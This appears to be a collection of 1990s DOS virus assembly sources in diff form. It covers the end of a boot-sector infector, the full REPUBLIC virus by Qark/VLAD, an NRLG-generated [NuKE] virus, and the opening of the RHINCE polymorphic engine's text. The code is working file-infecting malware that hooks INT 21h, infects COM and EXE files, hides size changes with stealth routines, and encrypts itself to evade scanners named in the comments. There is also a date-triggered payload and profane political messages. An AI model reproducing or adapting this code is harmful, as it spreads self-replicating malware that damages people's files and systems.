JMP >F7 ;Non-standard disk format, exit to avoid
;damage.
;
;Load the first of the two root directory sectors that will be used to store the VIRUS_DIR
;and original boot sector to top of memory - 0.5KB.
;
F6:
MOV B[OFFSET SECTOR-0200],CL ;Store destination sector # in VIRUS_BOOT.
MOV AX,0201 ;Select read sector function.
MOV BX,0600 ;Set disk I/O buffer offset.
INC DH ;Head 1, drive DL.
PUSHF
CALL D[OFFSET BIOS_OFFSET-0200] ;Load destination sector.
JB >F7 ;Exit if flag=failure.
;
;Confirm that the directory sector chosen to be the future location of VIRUS_DIR is empty
;before attempting infection. This prevents the loss of files which would result from
;the overwriting of root directory entries by the virus.
;
CMP B[BX],00 ;Empty root directory entry?
JNE >F7 ;No, so exit and don't infect disk.
;
;Copy the original boot sector's BPB to VIRUS_BOOT to allow functional infection of any
;diskette type.
;
MOV SI,BPB_START+0200 ;Set source offset.
MOV DI,BPB_START-0200 ;Set destination offset.
MOV CL,BPB_END-BPB_START ;Set repetition count (# of bytes) for move.
CLD ;Clear direction flag (fwd).
REP MOVSB ;Move BPB to virus to allow functional
;infection of any diskette format.
;
;Copy original boot sector end-of-sector text to VIRUS_BOOT to prevent easily visible changes
;to boot sector.
;
MOV SI,VIRUS_BOOT_END+0200 ;Set source offset.
MOV DI,VIRUS_BOOT_END-0200 ;Set destination offset.
MOV CL,SECTOR_END-VIRUS_BOOT_END ;Set repetition count (number of bytes) for
;text move.
CLD ;Clear direction flag (fwd).
REP MOVSB ;Move end-of-sector text to virus to prevent
;easily visible change to boot sector.
;
;Write VIRUS_BOOT to diskette boot sector.
;
MOV AX,0301 ;Select write-1-sector function.
XOR BX,BX ;Set disk I/O buffer offset.
MOV CL,01 ;Track 0, sector 1.
DEC DH ;Head 0, drive DL.
PUSHF
CALL D[OFFSET BIOS_OFFSET-0200] ;Write infected boot sector.
JB >F7 ;Exit if flag=failure.
;
;Increment floppy infection count.
;
INC W[OFFSET FLOPPY_COUNT-0200]
;
;Clear diskette infection flag.
;
MOV B[OFFSET UPDATE_FLAG-0200],CLEAR
;
;Write VIRUS_DIR and original boot sector to appropriate sectors.
;
MOV AX,0302 ;Select write-2-sectors function.
MOV BX,0200 ;Set disk I/O buffer offset.
MOV CL,B[OFFSET SECTOR-0200] ;Track 0, sector stored at 0189h.
INC DH ;Head 1, drive DL.
PUSHF
CALL D[OFFSET BIOS_OFFSET-0200] ;Relocate boot sector.
;
;Set diskette infection flag.
;
MOV B[OFFSET UPDATE_FLAG-0200],SET
;
;Exit diskette infection routine.
;
F7:
POP DI ;Restore all registers.
POP SI
POP ES
POP DS
POP DX
POP CX
POP BX
POP AX
RET ;Return to infection routine exit.
;
;Virus data area.
;
HARD_COUNT DW ? ;Number of HD infections since drop.
DROP_MODAY DW ? ;Month and day of HD drop.
DROP_YEAR DW ? ;Year of HD drop.
DROP_TIME DW ? ;Time of HD drop.
FLOPPY_COUNT DW ? ;Number of floppy infections since drop.
FLOPPY_MODAY DW ? ;Month and day of last floppy infection.
FLOPPY_YEAR DW ? ;Year of last floppy infection.
FLOPPY_TIME DW ? ;Time of last floppy infection.
INFECT_TAG2 DW INF_TAG2 ;Infection tag for VIRUS_DIR.
UPDATE_FLAG DB CLEAR ;Flag indicating floppy infection since last
;HD access.
;
DB 3 DUP 00 ;End-of-sector pad bytes.
;
;End of directory sector viral code.
;----------------------------------------------------------------------------------------------
;Start of MBR disk buffer.
;
MBR_BUFFER:
;
;----------------------------------------------------------------------------------------------
;
CODE ENDS
@@ -0,0 +1,830 @@
; REPUBLIC!
; +-------+ Qark/VLAD
;
;
; This virus is named because I (and metabolis) support a republic for
; Australia. Fuck the Union Jack off from our flag... we want something
; Australian in there... and an Australian head of state not some pommy
; bitch Queen and her corgis.
;
; A funny thing: I wrote a full-on MTE/TPE/DAME type polymorphic engine
; for this virus, but TBScan found it every time! But when i do the
; shitty XOR routine that's at the end, TBScan hardly finds anything!
; TBAV can be proud of it's capabilites with polymorphism, but for
; basic encryption it's a big thumbs down...
;
; Stats:
; - Disinfect on open, Infect on close.
; - No directory filesize change
; - No findfirst filesize change
; - Some anti-debugging features
;
; Anyway, this is my best virus so far. I've come a fair way since broken,
; fucked up brother in VLAD#1 I'm sure you'll agree. I wrote this virus
; a few months ago and am better than this already.
;
; As always, the A86 assembler is my favourite :)
org 0
db 0beh ;MOV SI,xxxx
delta dw offset enc_start + 100h
cld
call encrypt
enc_start:
push cs
pop ds ;DS=CS
sub si,offset enc_end ;The polymorphism is done.
mov word ptr [si+offset quit],20cdh
quit:
mov word ptr [si+offset quit],44c7h ;The bytes changed.
push es
push si
;If I don't get a feed soon, I'll start to fade...
mov ax,0FEEDh ;Feed ?
int 21h
cmp ax,0FADEh ;Yes...
je resident ;Fade...
mov ax,es
dec ax
mov ds,ax
cmp byte ptr [0],'Z'
jne resident
sub word ptr [3],160 ;2560 bytes of memory.
sub word ptr [12h],160 ;2560 bytes off TOM.
mov bx,word ptr [12h] ;Read in the TOM.
push cs
pop ds ;DS=CS
xor ax,ax ;ES=0 (Vector Table)
mov es,ax
mov ax,word ptr es:[132] ;Get int21h.
mov word ptr [si+offset i21],ax
mov ax,word ptr es:[134] ;Get int21h segment.
mov word ptr [si+offset i21+2],ax
mov es,bx ;ES=Segment to store virus.
xor di,di ;Zero in memory.
mov cx,offset length ;The size of the virus.
rep movsb ;Move the virus.
xor ax,ax
mov ds,ax ;ES=0 (Vector Table)
mov word ptr [132],offset infection
mov [134],bx ;BX=Virus Seg I hope!
resident:
pop si ;SI=IP (Virus start)
pop es ;ES=PSP
push cs
pop ds
cmp byte ptr [si+offset com_exe],1
je exe_exit
mov ax,word ptr [si+offset old3]
mov [100h],ax
mov al,byte ptr [si+offset old3+2]
mov [102h],al
push es
pop ds
call zero_all
mov ax,100h
jmp ax
Exe_Exit:
mov ax,es ;ES=PSP
add ax,10h ;EXE file start.
add word ptr [si+jump+2],ax
call zero_all
mov sp,word ptr [si+offset orig_sp]
add ax,word ptr [si+offset orig_ss] ;Fix SS with AX.
mov ss,ax
push es
pop ds
db 0eah
jump dd 0
Message db 'Go the Republic! '
db 'Fuck off Royal Family!',0
Creator db 'Qark/VLAD of the Republic of Australia',0
Infection:
push ax
xchg al,ah
cmp ax,004bh ;Exec. Don't infect on 4B01h because
je test_inf ;debug will find it then.
cmp al,43h ;Chmod.
je test_inf
cmp al,56h ;Rename.
je test_inf
cmp al,6ch ;Open.
je dis_inf
cmp al,3dh ;Open
je dis_inf
cmp al,11h ;FCB find.
je dir_listing
cmp al,12h ;Dir listing in progress.
je dir_listing
cmp al,4eh ;Find first.
je find_file
cmp al,4fh ;Find_next.
je find_file
cmp al,3eh ;Close.
je end_infect
pop ax
cmp ax,0FEEDh
je res_check ;Testing for installation ?
jump_exit:
jmp jend ;Exit TSR
res_check:
mov ax,0FADEh ;Return parameter.
iret
dir_listing:
jmp dir_stealth
find_file:
jmp search_stealth
dis_inf:
jmp full_stealth ;Disinfect on the fly.
end_infect:
jmp close_infect
jump2_exit:
jmp far_pop_exit ;Just an exit.
test_inf:
push bx
push cx
push dx
push si
push di
push ds
push es
call check_name
jc jump2_exit
mov ax,3d00h ;Open readonly.
mov dx,di ;DX=DI=Offset length
call int21h
jc jump2_exit
mov bx,ax
call get_sft
;Test for infection.
mov ax,word ptr es:[di+0dh] ;File time into AX from SFT.
mov word ptr es:[di+2],2 ;Bypass Read only attribute.
and ax,1f1fh ;Get rid of the shit we don't need.
cmp al,ah ;Compare the seconds with minutes.
je jump2_exit
Handle_Infection:
push cs
pop es ;ES=CS
;Read the File header in to test
;for EXE or COM.
mov ah,3fh ;Read from file.
mov cx,1ch ;1C bytes.
call int21h ;DX=Offset length from file open.
;We don't need the filename anymore
;so use that space as a buffer.
mov si,dx ;SI=DX=offset length.
mov di,offset header
mov cx,18h
rep movsb ;Move header to header.
mov si,dx ;SI=DX=Offset of length.
mov ax,word ptr [si] ;=Start of COM or EXE.
add al,ah ;Add possible MZ.
cmp al,167 ;Test for MZ.
je exe_infect
jmp com_infect
EXE_infect:
mov byte ptr com_exe,1 ;Signal EXE file.
cmp word ptr [si+1ah],0 ;Test for overlays.
jne exe_close_exit ;Quick... run!!!
push si ;SI=Offset of header
add si,0eh ;SS:SP are here.
mov di,offset orig_ss
movsw ;Move them!
movsw
mov di,offset jump ;The CS:IP go in here.
lodsw ;ADD SI,2 - AX destroyed.
movsw
movsw ;Move them!
pop si
call get_sft ;ES:DI = SFT for file.
mov ax,word ptr es:[di+11h] ;File length in DX:AX.
mov dx,word ptr es:[di+13h]
mov cx,16 ;Divide by paragraphs.
div cx
sub ax,word ptr [si+8] ;Subtract headersize.
mov word ptr delta,dx ;Initial IP.
add delta,offset enc_start ;Fix for polymorphics.
mov word ptr [si+14h],dx ;IP in header.
mov word ptr [si+16h],ax ;CS in header.
add dx,offset stack_end ;Fix SS:SP for file.
mov word ptr [si+0eh],ax ;We'll make SS=CS
mov word ptr [si+10h],dx ;SP=IP+Offset of our buffer.
mov ax,word ptr es:[di+11h] ;File length in DX:AX.
mov dx,word ptr es:[di+13h]
add ax,offset length ;Add the virus length on.
adc dx,0 ;32bit
mov cx,512 ;Divide by pages.
div cx
and dx,dx
jz no_page_fix
inc ax ;One more for the partial
;page!
no_page_fix:
mov word ptr [si+4],ax ;Number of pages.
mov word ptr [si+2],dx ;Partial page.
mov word ptr es:[di+15h],0 ;Lseek to start of file.
call get_date ;Save the old time/date.
mov ah,40h ;Write header to file.
mov dx,si ;Our header buffer.
mov cx,1ch ;1CH bytes.
call int21h
jc exe_close_exit
mov ax,4202h ;End of file. Smaller than
;using SFT's.
xor cx,cx ;Zero CX
cwd ;Zero DX (If AX < 8000H then
;CWD moves zero into DX)
call int21h
call enc_setup ;Thisll encrypt it and move
;it to the end of file.
exe_close_exit:
jmp com_close_exit
com_infect:
mov byte ptr com_exe,0 ;Flag COM infection.
mov ax,word ptr [si] ;Save COM files first 3 bytes.
mov word ptr old3,ax
mov al,[si+2]
mov byte ptr old3+2,al
call get_sft ;SFT is at ES:DI
mov ax,es:[di+11h] ;AX=File Size
cmp ax,64000
ja com_close_exit ;Too big.
cmp ax,1000
jb com_close_exit ;Too small.
push ax ;Save filesize.
mov newoff,ax ;For the new jump.
sub newoff,3 ;Fix the jump.
mov word ptr es:[di+15h],0 ;Lseek to start of file :)
call get_date ;Save original file date.
mov ah,40h
mov cx,3
mov dx,offset new3 ;Write the virus jump to start of
call int21h ;file.
pop ax ;Restore file size.
jc com_close_exit ;If an error occurred... exit.
mov word ptr es:[di+15h],ax ;Lseek to end of file.
add ax,offset enc_start + 100h ;File size + 100h.
mov word ptr delta,ax ;The delta offset for COM files.
call enc_setup
com_close_exit:
mov ah,3eh
call int21h
far_pop_exit:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jend:
db 0eah ;Opcode for jmpf
i21 dd 0
int21h proc near ;Our int 21h
pushf
call dword ptr cs:[i21]
ret
int21h endp
close_infect:
cmp bl,4
ja good_handle
pop ax
jmp jend
Good_Handle:
push bx ;Save the original registers.
push cx
push dx
push si
push di
push ds
push es
call get_sft ;ES:DI = SFT
mov ax,word ptr es:[di+0dh] ;AX=Time
and ax,1f1fh ;Shit we don't need.
cmp al,ah ;AL=AH means infected.
je far_pop_exit
mov dx,offset length
push cs
pop ds
mov word ptr es:[di+2],2 ;Read/Write mode.
mov word ptr es:[di+15h],0 ;Zero file pointer.
mov word ptr es:[di+17h],0 ;Zero file pointer.
add di,28h ;ES:DI=Extension
cmp word ptr es:[di],'OC'
je close_com
cmp word ptr es:[di],'XE'
jne far_pop_exit
Close_Exe:
inc di
inc di
cmp byte ptr es:[di],'E'
jne far_pop_exit
jmp handle_infection
Close_Com:
cmp byte ptr es:[di+2],'M'
jne far_pop_exit
jmp handle_infection
;-------
Full_Stealth:
push bx
push cx
push dx
push si
push di
push ds
push es
cmp al,6ch
jne stealth_6c
mov dx,si
stealth_6c:
call check_name
jnc do_stealth
Stealth_end:
jmp far_pop_exit
Do_Stealth:
mov ax,3d00h
mov dx,di
call int21h
jc stealth_end
mov bx,ax ;BX=filehandle
call get_sft
;ES:DI=SFT
mov ax,word ptr es:[di+0dh] ;File time into AX from SFT.
mov word ptr es:[di+2],2 ;Bypass Read only attribute.
and ax,1f1fh ;Get rid of the shit we don't need.
cmp al,ah ;Compare the seconds with minutes.
jne stealth_end ;Not infected...
mov ax,word ptr es:[di+11h] ;File size.
mov dx,word ptr es:[di+13h]
push dx
push ax
sub ax,1ch ;Header+time+date = 1ch
sbb dx,0
mov word ptr es:[di+15h],ax ;File pointer.
mov word ptr es:[di+17h],dx
mov ah,3fh
mov dx,offset header ;Read in header.
mov cx,1ch
call int21h
pop ax
pop dx ;DX:AX=length of file
sub ax,offset length ;EOF - length.
sbb dx,0
mov word ptr es:[di+15h],ax
mov word ptr es:[di+17h],dx
mov ah,40h ;Truncate virus off.
xor cx,cx
call int21h
jc stealth_end
mov word ptr es:[di+15h],0 ;Start of file
mov word ptr es:[di+17h],0
mov ah,40h
mov dx,offset header
mov cx,18h
call int21h ;Write original header back.
mov cx,word ptr time
mov dx,word ptr date
mov ax,5701h ;Put original time/date back.
call int21h
mov ah,3eh ;Close file.
call int21h
jmp stealth_end
Check_Name proc near
;Entry:
;DS:DX=Filename
;
;Exit:
;Carry if bad name.
;DS=ES=CS
;AX is fucked.
;SI = File Extension Somewhere.
;DI = Offset length.
mov si,dx ;DS:SI = Filename.
push cs
pop es ;ES=CS
mov ah,60h ;Get qualified filename.
mov di,offset length ;DI=Buffer for filename.
call int21h ;This converts it to uppercase too!
;CS:LENGTH = Filename in uppercase
;with path and drive. Much easier
;to handle now!
push cs
pop ds ;DS=CS
mov si,di ;SI=DI=Offset Length
cld ;Forward!
find_ascii_z:
lodsb
cmp al,0
jne find_ascii_z
sub si,4 ;Points to the file extension. 'EXE'
lodsw ;Mov AX,DS:[SI]
cmp ax,'XE' ;The 'EX' out of 'EXE'
jne test_com
lodsb ;Mov AL,DS:[SI]
cmp al,'E' ;The last 'E' in 'EXE'
jne Bad_Name
jmp do_file ;EXE-file
test_com:
cmp ax,'OC' ;The 'CO' out of 'COM'
jne Bad_Name
lodsb ;Mov AL,DS:[SI]
cmp al,'M'
je do_file ;COM-file
Bad_Name:
stc
ret
do_file:
clc
ret
Check_Name endp
Search_Stealth:
pop ax ;Restore AX.
call int21h
jc end_search
push es
push bx
push si
mov ah,2fh
call int21h
mov si,bx
mov bx,word ptr es:[si+16h]
and bx,1f1fh
cmp bl,bh
jne search_pop ;Is our marker set ?
sub word ptr es:[si+1ah],offset length ;Subtract the file length.
sbb word ptr es:[si+1ch],0
search_pop:
pop si
pop bx
pop es
clc
end_search:
retf 2 ;This is the same as an IRET
;except that the flags aren't popped
;off so our Carry Remains set.
Dir_Stealth:
;This bit means that wen you do a 'dir' there is no change in
;file size.
pop ax
call int21h ;Call the interrupt
cmp al,0 ;straight off.
jne end_of_dir
push es
push ax ;Save em.
push bx
push si
mov ah,2fh ;Get DTA address.
call int21h
mov si,bx
cmp byte ptr es:[si],0ffh ;Extended FCB ?
jne not_extended
add si,7 ;Add the extra's.
not_extended:
mov bx,word ptr es:[si+17h] ;Move time.
and bx,1f1fh
cmp bl,bh
jne dir_pop ;Is our marker set ?
sub word ptr es:[si+1dh],offset length ;Subtract the file length.
sbb word ptr es:[si+1fh],0
dir_pop:
pop si
pop bx
pop ax
pop es
end_of_dir:
iret
Get_Date proc near
mov ax,5700h ;Get Date/Time.
call int21h
mov word ptr time,cx
mov word ptr date,dx
ret
Get_date endp
Set_Marker proc near
mov cx,time
mov al,ch
and al,1fh
and cl,0e0h
or cl,al
mov dx,date
mov ax,5701h
call int21h
ret
Set_marker endp
Enc_Setup proc near
push cs
pop es
in al,40h
mov byte ptr cs:cipher,al
xor si,si
mov di,offset length ;Offset of our buffer.
mov cx,offset length ;Virus Length.
rep movsb ;Move the virus up in memory for
;encryption.
mov si,offset length + offset enc_start
call encrypt ;Encrypt virus.
mov ah,40h ;Write virus to file
mov dx,offset length ;Buffer for encrypted virus.
mov cx,offset length ;Virus length.
call int21h
call set_marker ;Mark file as infected.
ret
Enc_setup endp
Get_SFT Proc Near
;Entry: BX=File Handle.
;Exit: ES:DI=SFT.
push bx
mov ax,1220h ;Get Job File Table Entry. The byte pointed
int 2fh ;at by ES:[DI] contains the number of the
;SFT for the file handle.
xor bx,bx
mov bl,es:[di] ;Get address of System File Table Entry.
mov ax,1216h
int 2fh
pop bx
ret
Get_SFT EndP
Zero_All proc near
;Zero's everything cept AX.
xor bx,bx ;Zero BX
mov cx,bx
mov dx,bx
mov di,bx
ret
Zero_All endp
New3 db 0e9h ;The jump for the start of
Newoff dw 0 ;COM files.
orig_ss dw 0
orig_sp dw 0
com_exe db 0
old3 db 0cdh,20h,90h
enc_end: ;Encryption ends here.
; QaRK's |<-RaD TBSCaN eVaDeR!!!!!111
; Works every time :)
encrypt proc near
;Si = enc_start
mov cx,offset enc_end - offset enc_start
db 0b0h ;=MOV AL,xx
cipher db 0
enc_loop:
ror al,1
neg al
xor cs:[si],al ;<--- Whoah! Never guess this was encryption!
add al,al
inc si
loop enc_loop
ret
Encrypt endp
header db 18h dup (0) ;rewrite this
time dw 0 ;restore this
date dw 0
length db 200 dup (0)
stack_end:
@@ -0,0 +1,443 @@
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
.286
code segment
assume cs:code,ds:code
org 100h
start: CALL NEXT
NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------
ÿinc word ptr [di]
inc byte ptr [di]
add word ptr [di],0e6e9h
sub byte ptr [di],01fh
add byte ptr [di],05fh
ÿinc di
inc di
;----------------------------------------------------------
jmp bye ;######## BYE BYE F-PROT ! ##########
mov ah,4ch
int 21h
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
;-----------------------------------------------------------
mov ah,0bh ;######### BYE BYE TBAV ! ##########
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
;----------------------------------------------------------
loop deci ;repeat please!
;
;*****************************************************************
; #2 DECRYPT ROUTINE
;*****************************************************************
;
crypt: ;fuck label!
;
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt2] + bp ;di = first byte to decrypt
;---------------------------------------------------------------
deci2: ;
xor byte ptr cs:[di],1 ;decrytion rutine
inc di ;very simple...
loop deci2 ;
;---------------------------------------------------------------
crypt2: ;fuck label!
;
MOV AX,0CACAH ;call to my resident interrup mask
INT 21H ;for chek "I'm is residet?"
CMP Bh,0CAH ;is equal to CACA?
JE PUM2 ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS (SELECTABLE)
;*****************************************************************
ÿ;****************************************************************
; PROCESS TO REMAIN RESIDENT
;****************************************************************
mov ax,3521h
int 21h ;store the int 21 vectors
mov word ptr [bp+int21],bx ;in cs:int21
mov word ptr [bp+int21+2],es ;
;---------------------------------------------------------------
push cs ;
pop ax ;ax = my actual segment
dec ax ;dec my segment for look my MCB
mov es,ax ;
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs ;
pop es ;
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
sub bx,17 + offset fin ;and 100H for the PSP total
mov ah,4ah ;used memory
int 21h ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
mov ah,48h ;
int 21h ;request the memory to fuck DOS!
;---------------------------------------------------------------
dec ax ;ax=new segment
mov es,ax ;ax-1= new segment MCB
mov byte ptr es:[1],8 ;put '8' in the segment
;--------------------------------------------------------------
inc ax ;
mov es,ax ;es = new segment
lea si,[bp + offset start] ;si = start of virus
mov di,100h ;di = 100H (psp position)
mov cx,offset fin - start ;cx = lag of virus
push cs ;
pop ds ;ds = cs
cld ;mov the code
rep movsb ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus ;dx = new int21 handler
mov ax,2521h ;
push es ;
pop ds ;
int 21h ;set the vectors
;-------------------------------------------------------------
pum2: ;
;
mov ah,byte ptr [cs:bp + real] ;restore the 3
mov byte ptr cs:[100h],ah ;first bytes
mov ax,word ptr [cs:bp + real + 1] ;
mov word ptr cs:[101h],ax ;
;-------------------------------------------------------------
mov ax,100h ;
jmp ax ;jmp to execute
;
;*****************************************************************
;* HANDLER FOR THE INT 21H
;*****************************************************************
;
VIRUS: ;
;
cmp ah,4bh ;is a 4b function?
je REPRODUCCION ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;
make db '[NuKE] N.R.L.G. AZRAEL'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------
push cs ;
pop ds ;
mov ax,3524H ;get the dos error control
int 21h ;interupt
mov word ptr error,es ;and put in cs:error
mov word ptr error+2,bx ;
mov ax,2524H ;change the dos error control
mov dx,offset all ;for my "trap mask"
int 21h ;
;-------------------------------------------------------------
pop ds ;
pop es ;restore the registers
pop bp ;
pop di ;
pop si ;
popa ;
popf ;
;-------------------------------------------------------------
pushf ;put the registers
pusha ;
push si ;HEY! AZRAEL IS CRAZY?
push di ;PUSH, POP, PUSH, POP
push bp ;PLEEEEEAAAAAASEEEEEEEEE
push es ;PURIFY THIS SHIT!
push ds ;
;-------------------------------------------------------------
mov ax,4300h ;
int 21h ;get the file
mov word ptr cs:[attrib],cx ;atributes
;-------------------------------------------------------------
mov ax,4301h ;le saco los atributos al
xor cx,cx ;file
int 21h ;
;-------------------------------------------------------------
mov ax,3d02h ;open the file
int 21h ;for read/write
mov bx,ax ;bx=handle
;-------------------------------------------------------------
mov ax,5700h ;
int 21h ;get the file date
mov word ptr cs:[hora],cx ;put the hour
mov word ptr cs:[dia],dx ;put the day
and cx,word ptr cs:[fecha] ;calculate the seconds
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
jne seguir ;yes! the file is infected!
jmp cerrar ;
;------------------------------------------------------------
seguir: ;
mov ax,4202h ;move the pointer to end
call movedor ;of the file
;------------------------------------------------------------
push cs ;
pop ds ;
sub ax,3 ;calculate the
mov word ptr [cs:largo],ax ;jmp long
;-------------------------------------------------------------
mov ax,04200h ;move the pointer to
call movedor ;start of file
;----------------------------------------------------------
push cs ;
pop ds ;read the 3 first bytes
mov ah,3fh ;
mov cx,3 ;
lea dx,[cs:real] ;put the bytes in cs:[real]
int 21h ;
;----------------------------------------------------------
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
jne er1 ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------
mov ax,4200h ;move the pointer
call movedor ;to start fo file
;----------------------------------------------------------
push cs ;
pop ds ;
mov ah,40h ;
mov cx,1 ;write the JMP
lea dx,[cs:jump] ;instruccion in the
int 21h ;fist byte of the file
;----------------------------------------------------------
mov ah,40h ;write the value of jmp
mov cx,2 ;in the file
lea dx,[cs:largo] ;
int 21h ;
;----------------------------------------------------------
mov ax,04202h ;move the pointer to
call movedor ;end of file
;----------------------------------------------------------
push cs ;
pop ds ;move the code
push cs ;of my virus
pop es ;to cs:end+50
cld ;for encrypt
mov si,100h ;
mov di,offset fin + 50 ;
mov cx,offset fin - 100h ;
rep movsb ;
;----------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
enc: ;
xor byte ptr cs:[di],1 ;encrypt the virus
inc di ;code
loop enc ;
;---------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
mov dx,1
enc2: ;
ÿsub byte ptr [di],05fh
add byte ptr [di],01fh
sub word ptr [di],0e6e9h
dec byte ptr [di]
dec word ptr [di]
ÿinc di
inc di ;the virus code
loop enc2 ;
;--------------------------------------------
mov ah,40h ;
mov cx,offset fin - offset start ;copy the virus
mov dx,offset fin + 50 ;to end of file
int 21h ;
;----------------------------------------------------------
cerrar: ;
;restore the
mov ax,5701h ;date and time
mov cx,word ptr cs:[hora] ;file
mov dx,word ptr cs:[dia] ;
or cx,word ptr cs:[fecha] ;and mark the seconds
int 21h ;
;----------------------------------------------------------
mov ah,3eh ;
int 21h ;close the file
;----------------------------------------------------------
pop ds ;
pop es ;restore the
pop bp ;registers
pop di ;
pop si ;
popa ;
popf ;
;----------------------------------------------------------
pusha ;
;
mov ax,4301h ;restores the atributes
mov cx,word ptr cs:[attrib] ;of the file
int 21h ;
;
popa ;
;----------------------------------------------------------
pushf ;
pusha ; 8-( = f-prot
push si ;
push di ; 8-( = tbav
push bp ;
push es ; 8-) = I'm
push ds ;
;----------------------------------------------------------
mov ax,2524H ;
lea bx,error ;restore the
mov ds,bx ;errors handler
lea bx,error+2 ;
int 21h ;
;----------------------------------------------------------
pop ds ;
pop es ;
pop bp ;restore the
pop di ;resgisters
pop si ;
popa ;
popf ;
;----------------------------------------------------------
JMP A3 ;jmp to orig. INT 21
;
;**********************************************************
; SUBRUTINES AREA
;**********************************************************
;
movedor: ;
;
xor cx,cx ;use to move file pointer
xor dx,dx ;
int 21h ;
ret ;
;----------------------------------------------------------
all: ;
;
XOR AL,AL ;use to set
iret ;error flag
;***********************************************************
; DATA AREA
;***********************************************************
largo dw ?
jump db 0e9h
real db 0cdh,20h,0
hora dw ?
dia dw ?
attrib dw ?
int21 dd ?
error dd ?
ÿ;---------------------------------
action: ;Call label
MOV AH,2AH ;
INT 21H ;get date
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
JE cont ;nop! fuck ret
cmp byte ptr cs:[action_dia+bp],32 ;
jne no_day ;
cont: ;
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
je set ;
cmp byte ptr cs:[action_mes+bp],13 ;
jne NO_DAY ;nop! fuck ret
set: ;
mov AH,9 ;yeah!!
MOV DX,OFFSET PAO ;print my text!
INT 21H ;now!
INT 20H ;an finsh te program
NO_DAY: ;label to incorrect date
ret ;return from call
;---------------------------------
ÿ
PAO:
DB 10,13,'YOU ARE INFECTED WITH A VIRUS!!! "RETURN FIRE!" ver 2.8 "F-prot cannot survive!!"','$'
;*****************************************************
dir_s:
pushf
push cs
call a3 ;Get file Stats
test al,al ;Good FCB?
jnz no_good ;nope
push ax
push bx
push es
mov ah,51h ;Is this Undocmented? huh...
int 21h
mov es,bx
cmp bx,es:[16h]
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;Get file DTA
int 21h
pop ax
inc al
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh ;UnMask Seconds Field
xor al,byte ptr cs:fechad
jnz not_infected
and byte ptr es:[bx+17h],0e0h
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
sbb es:[bx+1fh],ax
not_infected:pop es
pop bx
pop ax
no_good: iret
;********************************************************************
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
;*********************************************************************
ÿaction_dia Db 07H ;day for the action
action_mes Db 04H ;month for the action
FECHA DW 01eH ;Secon for mark
FECHAd Db 01eH ;Secon for mark dir st
fin:
code ends
end start
@@ -0,0 +1,315 @@
; RHINCE 2.0, by Rhincewind [Vlad]
;
; This is the accompanying textfile for RHINCE v2.0, where RHINCE stands for
; "Rickety and Hardly Insidious yet New Chaos Engine". There's been quite
; a lot of feedback on the original release, both positive and negative. The
; negative reviews mainly dealt with the engine being so obscenely
; ineffective. To you I say, you missed the point: RHINCE was and is an
; experiment in writing small polymorphic engines using tables.
;
; I rewrote RHINCE because I came up with a method that I hoped would make
; it much, much shorter, say, under 300 bytes. Not so I'm afraid, the pure
; v1.0 rewrite amounted to 367 bytes.
;
; This version doesn't use encoding routines that use tables. No, it uses
; one encoding routine and a set of tables. In almost every engine, the
; routines all have a certain structure in common and yet they're never quite
; the same so optimisation by using subroutines is difficult. This is an
; easier approach:
;
; Encoding takes place byte for byte, and a tablestring is used to describe
; it's specifics. First byte in the string is the commandbyte:
;
; bit 4 quote next byte.
